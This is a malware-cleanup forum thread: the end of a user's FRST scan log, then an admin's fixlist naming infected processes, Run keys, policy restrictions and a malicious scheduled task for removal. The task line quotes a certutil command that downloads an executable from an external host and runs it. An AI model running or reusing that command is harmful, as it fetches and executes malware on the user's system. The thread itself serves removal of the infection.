2019-04-10 09:12 - 2019-03-14 09:51 - 000226304 _____ (Microsoft Corporation) C:\WINDOWS\system32\TetheringMgr.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 001410560 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2019-04-10 09:12 - 2019-03-14 09:50 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2019-04-10 09:12 - 2019-03-14 09:50 - 000176640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2019-04-10 09:12 - 2019-03-14 03:57 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2019-04-09 15:01 - 2019-04-09 15:01 - 000000110 ____H C:\Users\TATTOO NR\Desktop\51392159_284362515572546_4538713849758482432_n.jpg.uid-zps
2019-04-09 09:42 - 2019-04-09 09:42 - 000000110 ____H C:\Users\TATTOO NR\Desktop\56513104_450817988996773_8509636489024372736_n.jpg.uid-zps
2019-04-04 09:10 - 2019-04-04 09:10 - 000000110 ____H C:\Users\TATTOO NR\Desktop\stiahnuť.jpgdgvdvs.jpg.uid-zps
2019-04-03 09:37 - 2019-04-03 09:37 - 000000110 ____H C:\Users\TATTOO NR\Desktop\56661833_814410745562772_4941172643538665472_n.jpg.uid-zps
2019-04-02 09:59 - 2019-04-02 09:59 - 000000110 ____H C:\Users\TATTOO NR\Desktop\oak.jpg.uid-zps
2019-03-29 10:27 - 2019-03-29 10:27 - 000000110 ____H C:\Users\TATTOO NR\Desktop\7b0a60c4ceff6dc73ea538792e018659.jpg.uid-zps
2019-03-25 10:20 - 2019-03-25 10:20 - 000000110 ____H C:\Users\TATTOO NR\Desktop\Bez názvu.pngdsvsvs.png.uid-zps
2019-03-25 10:16 - 2019-03-25 10:16 - 000000110 ____H C:\Users\TATTOO NR\Desktop\5a837c5dc14a471f7855cf3abb21bfb8.jpg.uid-zps
2019-03-21 10:25 - 2019-03-21 10:25 - 000000110 ____H C:\Users\TATTOO NR\Desktop\52838491_2053531971605785_4529059197068771328_n.jpg.uid-zps
2019-03-20 10:40 - 2019-03-20 10:40 - 000000110 ____H C:\Users\TATTOO NR\Desktop\fc95887d0b1ab9f8d12fc468d1ff861e--rose-jewelry-rose-tattoos.jpg.uid-zps
2019-03-19 10:24 - 2019-03-19 10:24 - 000000110 ____H C:\Users\TATTOO NR\Desktop\69782_2.jpg.uid-zps
2019-03-19 10:21 - 2019-03-19 10:21 - 000000110 ____H C:\Users\TATTOO NR\Desktop\165037545-256-k22498.jpg.uid-zps
2019-03-18 16:06 - 2019-03-18 16:06 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53735603_561863657655130_8592179309412614144_n.jpg.uid-zps
2019-03-18 16:02 - 2019-03-18 16:02 - 000000110 ____H C:\Users\TATTOO NR\Desktop\51223793_480541505809113_1147320454936002560_n.jpg.uid-zps
2019-03-15 02:36 - 2019-03-15 02:36 - 003753088 _____ (Hewlett-Packard Development Company, LP) C:\WINDOWS\system32\HPScanTRDrv_DJ3630.dll
2019-03-15 02:36 - 2019-03-15 02:36 - 002952200 _____ (HP Inc.) C:\WINDOWS\system32\hpinkinsE311.exe
2019-03-15 02:36 - 2019-03-15 02:36 - 000592000 _____ (Hewlett-Packard) C:\WINDOWS\system32\HPWia2_DJ3630.dll
2019-03-15 02:36 - 2019-03-15 02:36 - 000392200 _____ (HP Inc.) C:\WINDOWS\system32\hpinkstsE311LM.dll
2019-03-15 02:36 - 2019-03-15 02:36 - 000327688 _____ (HP Inc.) C:\WINDOWS\system32\hpinkcoiE311.dll
2019-03-13 16:00 - 2019-03-06 17:37 - 001616608 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2019-03-13 16:00 - 2019-03-06 17:14 - 001180672 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2019-03-13 16:00 - 2019-03-06 11:16 - 001188000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2019-03-13 16:00 - 2019-03-06 11:04 - 000628024 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpx.dll
2019-03-13 16:00 - 2019-03-06 10:29 - 002364928 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2019-03-13 16:00 - 2019-03-06 10:29 - 000736256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2019-03-13 16:00 - 2019-03-06 08:14 - 000785568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2019-03-13 16:00 - 2019-03-06 08:14 - 000450872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpx.dll
2019-03-13 16:00 - 2019-03-06 07:50 - 001347584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2019-03-13 16:00 - 2019-02-21 05:26 - 000313344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd2x40.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 002871304 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2019-03-13 16:00 - 2019-02-16 15:02 - 001644040 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000808456 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000735752 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000620040 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000460296 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000322568 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2019-03-13 16:00 - 2019-02-16 15:02 - 000147464 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2019-03-13 16:00 - 2019-02-16 14:57 - 001048472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2019-03-13 16:00 - 2019-02-16 14:56 - 000549520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2019-03-13 16:00 - 2019-02-16 14:53 - 001516416 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2019-03-13 16:00 - 2019-02-16 14:34 - 004718080 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2019-03-13 16:00 - 2019-02-16 14:34 - 001725952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2019-03-13 16:00 - 2019-02-16 14:33 - 001786880 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2019-03-13 16:00 - 2019-02-16 14:32 - 002051072 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2019-03-13 16:00 - 2019-02-16 14:31 - 001271808 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2019-03-13 16:00 - 2019-02-16 14:31 - 001003520 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2019-03-13 16:00 - 2019-02-16 14:31 - 000615424 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2019-03-13 16:00 - 2019-02-16 14:30 - 002019840 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2019-03-13 16:00 - 2019-02-16 14:22 - 001322176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2019-03-13 16:00 - 2019-02-16 14:07 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2019-03-13 16:00 - 2019-02-16 14:06 - 001530880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2019-03-13 16:00 - 2019-02-16 14:06 - 001451520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2019-03-13 16:00 - 2019-02-16 12:24 - 023862272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2019-03-13 16:00 - 2019-02-16 12:22 - 019525120 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2019-03-13 16:00 - 2019-02-16 10:16 - 000511800 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2019-03-13 16:00 - 2019-02-16 10:15 - 000505656 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2019-03-13 16:00 - 2019-02-16 10:03 - 007901392 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2019-03-13 16:00 - 2019-02-16 10:03 - 000510288 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanager.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 005821440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 003291632 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 001934800 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 001792712 _____ (Microsoft Corporation) C:\WINDOWS\system32\propsys.dll
2019-03-13 16:00 - 2019-02-16 10:02 - 000432952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2019-03-13 16:00 - 2019-02-16 10:01 - 001209696 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2019-03-13 16:00 - 2019-02-16 10:01 - 001028920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2019-03-13 16:00 - 2019-02-16 10:01 - 000594024 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2019-03-13 16:00 - 2019-02-16 09:57 - 000383288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2019-03-13 16:00 - 2019-02-16 09:53 - 000443632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll
2019-03-13 16:00 - 2019-02-16 09:51 - 002479168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2019-03-13 16:00 - 2019-02-16 09:51 - 001584536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\propsys.dll
2019-03-13 16:00 - 2019-02-16 09:50 - 001805648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll
2019-03-13 16:00 - 2019-02-16 09:50 - 001011872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2019-03-13 16:00 - 2019-02-16 09:37 - 009084928 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2019-03-13 16:00 - 2019-02-16 09:36 - 007057408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2019-03-13 16:00 - 2019-02-16 09:34 - 005883904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2019-03-13 16:00 - 2019-02-16 09:33 - 006646784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2019-03-13 16:00 - 2019-02-16 09:31 - 002825728 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll
2019-03-13 16:00 - 2019-02-16 09:30 - 001986560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll
2019-03-13 16:00 - 2019-02-16 09:29 - 001768448 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 003381248 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 002585600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 001668096 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdprt.dll
2019-03-13 16:00 - 2019-02-16 09:28 - 000713216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingOnlineServices.dll
2019-03-13 16:00 - 2019-02-16 09:27 - 001364992 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll
2019-03-13 16:00 - 2019-02-16 09:27 - 000686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2019-03-13 16:00 - 2019-02-16 09:26 - 001225216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2019-03-13 16:00 - 2019-02-16 09:26 - 000943616 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll
2019-03-13 16:00 - 2019-02-16 09:25 - 000884224 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2019-03-13 16:00 - 2019-02-16 09:25 - 000652800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2019-03-13 15:59 - 2019-03-06 17:36 - 001047352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2019-03-13 15:59 - 2019-03-06 17:17 - 000810496 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2019-03-13 15:59 - 2019-03-06 17:17 - 000116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2019-03-13 15:59 - 2019-03-06 17:12 - 001180672 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2019-03-13 15:59 - 2019-03-06 14:18 - 000918032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ReAgent.dll
2019-03-13 15:59 - 2019-03-06 11:16 - 000722744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimgapi.dll
2019-03-13 15:59 - 2019-03-06 11:16 - 000527160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wimserv.exe
2019-03-13 15:59 - 2019-03-06 11:10 - 000248880 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2019-03-13 15:59 - 2019-03-06 11:07 - 000376120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2019-03-13 15:59 - 2019-03-06 11:04 - 000945464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refsv1.sys
2019-03-13 15:59 - 2019-03-06 11:03 - 001921848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\refs.sys
2019-03-13 15:59 - 2019-03-06 11:03 - 000375608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msrpc.sys
2019-03-13 15:59 - 2019-03-06 11:02 - 000626488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\afd.sys
2019-03-13 15:59 - 2019-03-06 10:33 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2019-03-13 15:59 - 2019-03-06 10:32 - 000358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\exfat.sys
2019-03-13 15:59 - 2019-03-06 10:31 - 000324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\udfs.sys
2019-03-13 15:59 - 2019-03-06 10:31 - 000266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srvnet.sys
2019-03-13 15:59 - 2019-03-06 10:26 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\npfs.sys
2019-03-13 15:59 - 2019-03-06 10:26 - 000031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msfs.sys
2019-03-13 15:59 - 2019-03-06 10:25 - 000093696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cdfs.sys
2019-03-13 15:59 - 2019-03-06 08:13 - 000607248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wimgapi.dll
2019-03-13 15:59 - 2019-03-06 07:51 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werdiagcontroller.dll
2019-03-13 15:59 - 2019-02-16 15:02 - 000071176 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32appinventorycsp.dll
2019-03-13 15:59 - 2019-02-16 14:57 - 000506088 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2019-03-13 15:59 - 2019-02-16 14:56 - 000540984 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2019-03-13 15:59 - 2019-02-16 14:34 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AcLayers.dll
2019-03-13 15:59 - 2019-02-16 14:31 - 000861184 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2019-03-13 15:59 - 2019-02-16 14:30 - 000877568 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2019-03-13 15:59 - 2019-02-16 14:29 - 000174080 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngOnline.dll
2019-03-13 15:59 - 2019-02-16 14:29 - 000091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcbuilder.exe
2019-03-13 15:59 - 2019-02-16 14:24 - 000444176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2019-03-13 15:59 - 2019-02-16 14:08 - 000373760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcLayers.dll
2019-03-13 15:59 - 2019-02-16 14:07 - 000484352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\resutils.dll
2019-03-13 15:59 - 2019-02-16 14:06 - 000774656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clusapi.dll
2019-03-13 15:59 - 2019-02-16 14:06 - 000765952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2019-03-13 15:59 - 2019-02-16 14:04 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mcbuilder.exe
2019-03-13 15:59 - 2019-02-16 10:15 - 000035640 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2019-03-13 15:59 - 2019-02-16 10:05 - 000087800 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskhostw.exe
2019-03-13 15:59 - 2019-02-16 10:04 - 000193032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2019-03-13 15:59 - 2019-02-16 10:02 - 000705848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
2019-03-13 15:59 - 2019-02-16 10:02 - 000413712 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2019-03-13 15:59 - 2019-02-16 10:01 - 001285424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2019-03-13 15:59 - 2019-02-16 10:01 - 000641984 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp_win.dll
2019-03-13 15:59 - 2019-02-16 10:01 - 000335672 _____ (Microsoft Corporation) C:\WINDOWS\system32\moshostcore.dll
2019-03-13 15:59 - 2019-02-16 10:01 - 000161664 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTWorkQ.dll
2019-03-13 15:59 - 2019-02-16 09:51 - 000170952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RTWorkQ.dll
2019-03-13 15:59 - 2019-02-16 09:50 - 000504072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp_win.dll
2019-03-13 15:59 - 2019-02-16 09:33 - 000054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialMigrationHandler.dll
2019-03-13 15:59 - 2019-02-16 09:33 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredentialMigrationHandler.dll
2019-03-13 15:59 - 2019-02-16 09:32 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2019-03-13 15:59 - 2019-02-16 09:31 - 000392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2019-03-13 15:59 - 2019-02-16 09:31 - 000126976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srpapi.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 002449408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 001124352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdprt.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000530432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppLockerCSP.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppLockerCSP.dll
2019-03-13 15:59 - 2019-02-16 09:30 - 000145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2019-03-13 15:59 - 2019-02-16 09:28 - 000705024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2019-03-13 15:59 - 2019-02-16 09:28 - 000528384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActivationManager.dll
2019-03-13 15:59 - 2019-02-16 09:27 - 000729088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2019-03-13 15:59 - 2019-02-16 09:26 - 000401920 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2019-03-13 15:46 - 2019-03-13 15:46 - 000000110 ____H C:\Users\TATTOO NR\Desktop\53647244_241340536814671_4800761078776594432_n.jpg.uid-zps

==================== Three months (modified) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-06-10 17:54 - 2018-03-13 17:09 - 000000000 ____D C:\FRST
2019-06-10 17:28 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-06-10 17:17 - 2018-05-30 09:16 - 000003510 _____ C:\WINDOWS\System32\Tasks\DashlaneUpgradeCheck
2019-06-10 17:12 - 2018-05-30 09:16 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2019-06-10 17:11 - 2018-04-11 23:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2019-06-10 17:11 - 2017-12-09 06:22 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2019-06-10 17:11 - 2017-12-09 06:21 - 000065536 _____ C:\WINDOWS\psp_storage.bin
2019-06-10 17:10 - 2018-03-13 17:17 - 000000000 ____D C:\AdwCleaner
2019-06-10 15:57 - 2018-04-11 23:04 - 000016384 _____ C:\WINDOWS\system32\config\ELAM
2019-06-10 15:51 - 2018-07-19 14:52 - 000000000 ____D C:\Users\TATTOO NR\AppData\Roaming\uTorrent
2019-06-10 15:49 - 2018-02-19 15:26 - 000000000 ____D C:\WINDOWS\system32\Drivers\NGCx64
2019-06-10 15:48 - 2018-05-30 08:56 - 000000000 ____D C:\Users\TATTOO NR
2019-06-10 15:48 - 2017-12-09 18:07 - 000000000 ____D C:\Program Files\Common Files\AV
2019-06-10 15:26 - 2018-07-19 14:53 - 000000000 ____D C:\stahovanie
2019-06-10 15:25 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\GroupPolicy
2019-06-10 14:55 - 2018-05-30 08:50 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2019-06-10 09:38 - 2017-07-27 22:46 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2019-06-10 09:36 - 2019-01-05 13:56 - 000002017 _____ C:\Users\TATTOO NR\Desktop\ANYCUBIC Photon Slicer64.lnk
2019-06-10 09:32 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps
2019-06-10 09:32 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2019-06-01 22:31 - 2018-05-30 09:16 - 000004210 _____ C:\WINDOWS\System32\Tasks\CCleaner Update
2019-05-22 09:27 - 2017-12-08 22:37 - 000002305 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2019-05-22 09:27 - 2017-12-08 22:37 - 000002264 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2019-05-20 09:16 - 2018-01-12 10:20 - 000000000 ____D C:\Program Files\rempl
2019-05-20 09:13 - 2018-04-12 01:36 - 000000000 ____D C:\WINDOWS\INF
2019-05-20 09:06 - 2018-05-30 09:08 - 000838560 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2019-05-20 08:58 - 2018-05-30 08:50 - 001383040 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\TextInput
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\ShellExperiences
2019-05-15 17:26 - 2018-04-12 01:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2019-05-15 10:16 - 2018-04-12 01:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2019-05-15 10:03 - 2017-12-09 17:36 - 000000000 ____D C:\WINDOWS\system32\MRT
2019-05-15 09:57 - 2017-12-09 17:35 - 132445408 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2019-05-15 09:15 - 2018-05-30 09:16 - 000003418 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2019-05-15 09:15 - 2018-05-30 09:16 - 000003294 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore

==================== Files in the root of some directories =======

2018-12-12 11:44 - 2018-12-08 14:47 - 000000274 ___SH () C:\Users\TATTOO NR\AppData\Roaming\arcuafh
2018-12-12 11:44 - 2018-12-08 14:47 - 000287232 ___SH () C:\Users\TATTOO NR\AppData\Roaming\wvteeus

==================== FLock =======

2019-06-03 09:38 C:\System Volume Information
2019-06-10 17:45 C:\WINDOWS\windefender.exe
2019-06-10 15:53 C:\WINDOWS\SysWOW64\tijmjrmm

==================== SigCheck ===============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ============================
Přílohy
Addition2.zip
(27.34 KiB) Staženo 34 x

Uživatelský avatar
Rudy
Site Admin
Site Admin
Příspěvky: 118192
Registrován: 30 říj 2003 13:42
Bydliště: Plzeň
Kontaktovat uživatele:

Re: Otvaranie nahodnych stranok na internete, pomaly pocitat

#6 Příspěvek od Rudy »

Otevřte poznámkový blok a zkopírujte do něj:
Start

CloseProcesses:
C:\Users\TATTOO NR\AppData\Local\Temp\is-9H4DE.tmp\Boutixc.exe
C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw\xjmcc2x5pii.exe
C:\Users\TATTOO NR\AppData\Local\App\svchost.exe
C:\Users\TATTOO NR\AppData\Local\Temp\is-67RHR.tmp\xjmcc2x5pii.tmp
C:\Users\TATTOO NR\AppData\Local\Temp\is-LAKTE.tmp\Boutixc.tmp
C:\Windows\rss\csrss.exe
C:\Windows\windefender.exe
C:\Users\TATTOO NR\AppData\Local\Temp\csrss\cloudnet.exe
C:\Program Files\HIXKNY8VO4
HKLM\...\RunOnce: [4lmgurqpczt] => C:\Program Files (x86)\EatPizza\616386955.exe [678400 2019-06-10] () [File not signed]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [App] => C:\Users\TATTOO NR\AppData\Local\App\svchost.exe [589824 2019-06-10] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [LingeringViolet] => C:\WINDOWS\rss\csrss.exe [5223936 2019-06-10] () [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [7018735] => C:\Users\TATTOO NR\AppData\Local\Temp\is-9H4DE.tmp\Boutixc.exe [3524063 2019-06-10] ( ) [File not signed] <==== ATTENTION
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [0BIHA30U5ZHWRH1] => C:\Program Files\HIXKNY8VO4\HIXKNY8VO.exe [1050112 2019-06-10] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [9887864] => C:\Users\TATTOO NR\AppData\Roaming\4zvrrfvi3jw\xjmcc2x5pii.exe [2384286 2019-06-10] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [CloudNet] => C:\Users\TATTOO NR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-06-10] (EpicNet Inc.) [File not signed] <==== ATTENTION
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {716CF578-7C14-401E-8B7B-DAD60658B36B} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://nevernews.club/app/app.exe C:\Users\TATTOO NR\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\TATTOO NR\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
